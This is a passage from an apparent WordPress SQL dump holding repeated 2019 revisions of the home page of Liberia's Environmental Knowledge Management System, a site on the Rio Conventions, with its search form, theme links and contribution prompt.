href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"#\">\n						Click me\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 16:38:18','2019-11-09 16:38:18','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(525,1,'2019-11-09 16:39:23','2019-11-09 16:39:23','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"#\">\n						Click me\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 16:39:23','2019-11-09 16:39:23','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(526,1,'2019-11-09 16:41:19','2019-11-09 16:41:19','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"#\">\n						Click me\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 16:41:19','2019-11-09 16:41:19','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(527,1,'2019-11-09 16:43:02','2019-11-09 16:43:02','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 16:43:02','2019-11-09 16:43:02','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(528,1,'2019-11-09 16:43:48','2019-11-09 16:43:48','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 16:43:48','2019-11-09 16:43:48','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(529,1,'2019-11-09 16:44:57','2019-11-09 16:44:57','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 16:44:57','2019-11-09 16:44:57','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(530,1,'2019-11-09 16:45:22','2019-11-09 16:45:22','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 16:45:22','2019-11-09 16:45:22','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(531,1,'2019-11-09 16:48:57','2019-11-09 16:48:57','','featured_cbd','Photo Credit: Trokon Saykpa','inherit','open','closed','','featured_cbd','','','2019-11-09 16:49:42','2019-11-09 16:49:42','',9,'https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd.jpg',0,'attachment','image/jpeg',0),(533,1,'2019-11-09 16:49:53','2019-11-09 16:49:53','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 16:49:53','2019-11-09 16:49:53','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(534,1,'2019-11-09 16:54:56','2019-11-09 16:54:56','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics and Institutions Resources.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 16:54:56','2019-11-09 16:54:56','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(535,1,'2019-11-09 16:56:13','2019-11-09 16:56:13','<h2>Welcome to the EKMS</h2>		\n		The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						